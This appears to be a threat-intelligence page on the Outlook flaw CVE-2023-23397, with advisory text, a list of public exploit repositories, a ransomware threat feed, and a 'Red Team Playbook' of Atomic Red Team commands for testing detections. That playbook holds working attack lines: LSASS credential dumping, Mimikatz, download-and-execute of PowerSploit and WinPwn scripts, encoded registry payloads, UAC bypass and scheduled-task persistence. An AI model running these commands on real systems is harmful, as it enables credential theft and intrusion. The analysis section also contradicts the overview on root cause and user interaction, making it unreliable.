CVE-2023-23397
Overview
This vulnerability is an elevation of privilege issue caused by improper validation of input data within Microsoft Outlook's handling of specially crafted messages. The root cause lies in insufficient input sanitization in the message processing component, allowing an attacker to manipulate internal security contexts. The flaw affects Microsoft Outlook components in Microsoft Office LTSC 2021 and related products that process messaging data.
Vulnerability Description
Microsoft Outlook Elevation of Privilege Vulnerability
Impact
An unauthenticated attacker can send a specially crafted message to a victim's mailbox, which when processed by Outlook, allows the attacker to execute code with elevated privileges on the target system. This can lead to full compromise of the user's environment, including access to sensitive data and lateral movement within the network. No user interaction or prior authentication is required, increasing the attack's feasibility in real-world scenarios.
Solution
Microsoft has released security updates addressing this vulnerability in Microsoft Office LTSC 2021 and related products. Administrators should apply the patches detailed in the Microsoft Security Response Center advisory available at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397. The advisory provides version-specific update packages and installation instructions to remediate the issue effectively.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The identified vulnerability within Microsoft Outlook represents a significant elevation of privilege risk, primarily affecting various versions of Microsoft Office applications, including the 2013, 2016, and 2019 iterations, as well as Microsoft 365 Apps. This flaw arises from improper handling of objects in memory, which can be exploited by an attacker to execute arbitrary code with elevated privileges. The underlying issue lies in the way Outlook processes certain types of messages, allowing an attacker to craft a malicious email that, when opened by a user, can trigger the execution of harmful payloads. This vulnerability is particularly concerning due to its high CVSS score of 9.8, indicating a critical level of risk.
Attack vectors for this vulnerability are primarily centered around social engineering tactics. An attacker could send a specially crafted email containing a malicious link or attachment to a target user. If the user opens the email and interacts with the content, the attacker could gain unauthorized access to the user's system, potentially leading to the installation of malware, data exfiltration, or lateral movement within the network. Exploitation scenarios could range from a simple phishing attempt to a more sophisticated campaign targeting high-value individuals within an organization, such as executives or IT administrators. The ease of exploitation, combined with the potential for significant damage, makes this vulnerability particularly attractive to threat actors.
The real-world impact of this vulnerability can be profound, especially for organizations that rely heavily on Microsoft Outlook for communication and collaboration. Successful exploitation could lead to unauthorized access to sensitive data, financial loss, and reputational damage. Businesses may face regulatory scrutiny if personal data is compromised, resulting in potential fines and legal repercussions. Furthermore, the ability for attackers to escalate privileges could facilitate broader attacks within the organization, increasing the risk of widespread data breaches and operational disruptions. The interconnected nature of modern IT environments means that a single compromised account could lead to a domino effect, impacting multiple systems and services.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected software is crucial to closing the window of opportunity for attackers. Organizations should also employ advanced email filtering solutions to detect and block malicious emails before they reach users' inboxes. User education and awareness training can further reduce the risk of successful phishing attempts by teaching employees to recognize suspicious emails and report them. Additionally, employing endpoint detection and response (EDR) tools can help identify and respond to anomalous behavior indicative of exploitation attempts, allowing organizations to take swift action to mitigate potential damage.
In conclusion, the elevation of privilege vulnerability in Microsoft Outlook poses a critical threat to organizations leveraging the software for communication. The potential for exploitation through social engineering tactics, coupled with the severe implications of unauthorized access, necessitates immediate attention from cybersecurity professionals. By adopting proactive detection and mitigation strategies, organizations can significantly reduce their risk exposure and safeguard their sensitive information from malicious actors.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2023-23397, with new exploitation events emerging after a period of relative quiet. This uptick is accompanied by a marginal increase in the EPSS score, reflecting sustained attacker interest and potential for successful exploitation. Although ransomware groups previously linked to similar vulnerabilities remain unconfirmed in association with this CVE, the presence of active proof-of-concept exploits in multiple programming languages underscores the accessibility of this vulnerability to a wider attacker base. For defenders, this development signals an elevated risk environment where opportunistic threat actors may leverage these readily available tools to escalate privileges within affected Microsoft Outlook deployments. Consequently, the threat level should be considered heightened, warranting increased vigilance despite the absence of confirmed ransomware campaigns exploiting this vulnerability at this time.
Update 2 — June 20, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2023-23397, with telemetry showing a doubling in detection occurrences and a corresponding increase in the Exploit Prediction Scoring System (EPSS) score. This upward trend signals growing adversary interest and potential exploitation attempts, despite the absence of confirmed ransomware campaigns leveraging this vulnerability. The proliferation of publicly available proof-of-concept exploits continues to lower the barrier for threat actors to conduct privilege escalation attacks within Microsoft Outlook environments. While ransomware groups remain unconfirmed as active exploiters, the involvement of notable threat actors such as BianLian and Black Basta in related campaigns elsewhere underscores the importance of heightened monitoring. Collectively, these developments elevate the threat posture, indicating that defenders should anticipate increased exploitation attempts and maintain heightened vigilance.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | 365 Apps | N/A |
cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*
|
|
|
Microsoft | Office | 2019 |
cpe:2.3:a:microsoft:office:2019:*:*:*:*:*:*:*
|
|
|
Microsoft | Office Long Term Servicing Channel | 2021 |
cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:*:*:*
|
|
|
Microsoft | Outlook | 2013 |
cpe:2.3:a:microsoft:outlook:2013:sp1:*:*:-:*:*:*
|
|
|
Microsoft | Outlook | 2013 |
cpe:2.3:a:microsoft:outlook:2013:sp1:*:*:rt:*:*:*
|
|
|
Microsoft | Outlook | 2016 |
cpe:2.3:a:microsoft:outlook:2016:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (29)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
api0cradle/CVE-2023-23397-POC-Powershell
|
api0cradle | 345 | 58 | 2023-03-16 | View |
|
sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY
Exploit for the CVE-2023-23397
|
sqrtZeroKnowledge | 158 | 42 | 2023-03-15 | View |
|
Trackflaw/CVE-2023-23397
Simple PoC of the CVE-2023-23397 vulnerability with the payload sent by email.
|
Trackflaw | 131 | 28 | 2023-03-20 | View |
|
ka7ana/CVE-2023-23397
Simple PoC in PowerShell for CVE-2023-23397
|
ka7ana | 40 | 12 | 2023-03-16 | View |
|
tiepologian/CVE-2023-23397
Proof of Concept for CVE-2023-23397 in Python
|
tiepologian | 25 | 4 | 2023-03-21 | View |
|
Muhammad-Ali007/OutlookNTLM_CVE-2023-23397
|
Muhammad-Ali007 | 22 | 1 | 2023-07-14 | View |
|
BronzeBee/cve-2023-23397
Python script for sending e-mails with CVE-2023-23397 payload using SMTP
|
BronzeBee | 14 | 1 | 2023-03-22 | View |
|
BillSkiCO/CVE-2023-23397_EXPLOIT
Generates meeting requests taking advantage of CVE-2023-23397. This requires the outlook thick client to send.
|
BillSkiCO | 7 | 7 | 2023-03-17 | View |
|
ahmedkhlief/CVE-2023-23397-POC
Exploit POC for CVE-2023-23397
|
ahmedkhlief | 6 | 7 | 2023-03-17 | View |
|
djackreuter/CVE-2023-23397-PoC
|
djackreuter | 9 | 2 | 2023-03-18 | View |
|
vlad-a-man/CVE-2023-23397
CVE-2023-23397 PoC
|
vlad-a-man | 8 | 2 | 2023-05-07 | View |
|
grn-bogo/CVE-2023-23397
Python script to create a message with the vulenrability properties set
|
grn-bogo | 4 | 3 | 2023-03-16 | View |
|
alicangnll/CVE-2023-23397
CVE-2023-23397 - Microsoft Outlook Vulnerability
|
alicangnll | 3 | 1 | 2023-03-16 | View |
|
Pushkarup/CVE-2023-23397
This script exploits CVE-2023-23397, a Zero-Day vulnerability in Microsoft Outlook, allowing the generation of malicious...
|
Pushkarup | 4 | 0 | 2023-10-26 | View |
|
P4x1s/CVE-2023-23397-POC
CVE-2023-23397漏洞的简单PoC,有效载荷通过电子邮件发送。
|
P4x1s | 3 | 0 | 2023-03-31 | View |
|
ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook
|
ahmedkhlief | 2 | 0 | 2023-03-19 | View |
|
TheUnknownSoul/CVE-2023-23397-PoW
Proof of Work of CVE-2023-23397 for vulnerable Microsoft Outlook client application.
|
TheUnknownSoul | 1 | 1 | 2024-03-20 | View |
|
j0eyv/CVE-2023-23397
|
j0eyv | 1 | 0 | 2023-03-16 | View |
|
Cyb3rMaddy/CVE-2023-23397-Report
An exploitation demo of Outlook Elevation of Privilege Vulnerability
|
Cyb3rMaddy | 1 | 0 | 2023-03-24 | View |
|
Phaedrik/CVE-2023-23397-POC
Two POCs I created for the CVE-2023-23397 Outlook NTLM vulnerability, to be used internally.
|
Phaedrik | 1 | 0 | 2026-01-09 | View |
|
Gilospy/CVE-2023-23397
Demonstration of CVE-2023-23397 Outlook Privellege Escalation vulnerability
|
Gilospy | 0 | 1 | 2025-04-07 | View |
|
moneertv/CVE-2023-23397
CVE-2023-23397 C# PoC
|
moneertv | 1 | 0 | 2023-03-18 | View |
|
SecCTechs/CVE-2023-23397
Patch for MS Outlook Critical Vulnerability - CVSS 9.8
|
SecCTechs | 1 | 0 | 2023-03-20 | View |
|
im007/CVE-2023-23397
CVE-2023-23397 Remediation Script (Powershell)
|
im007 | 0 | 1 | 2023-03-17 | View |
|
Zeppperoni/CVE-2023-23397-Patch
CVE-2023-23397 powershell patch script for Windows 10 and 11
|
Zeppperoni | 0 | 0 | 2023-03-24 | View |
|
stevesec/CVE-2023-23397
|
stevesec | 0 | 0 | 2023-03-23 | View |
|
ducnorth2712/CVE-2023-23397
|
ducnorth2712 | 0 | 0 | 2023-12-28 | View |
|
Symbolexe/CVE-2023-23397
CVE-2023-23397: Remote Code Execution Vulnerability in Microsoft Outlook
|
Symbolexe | 0 | 0 | 2024-06-22 | View |
|
jacquesquail/CVE-2023-23397
|
jacquesquail | 0 | 0 | 2023-03-29 | View |
Threat Feed
16 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
77 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
$extList = #{extension_id}
foreach ($extension in $extList) {
New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force
New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force}
Start chrome
Start-Sleep -Seconds 30
Stop-Process -Name "chrome"
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-23397 |
| msrc.microsoft.com |
GitHub CVE
vendor-advisory
|
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-23397 |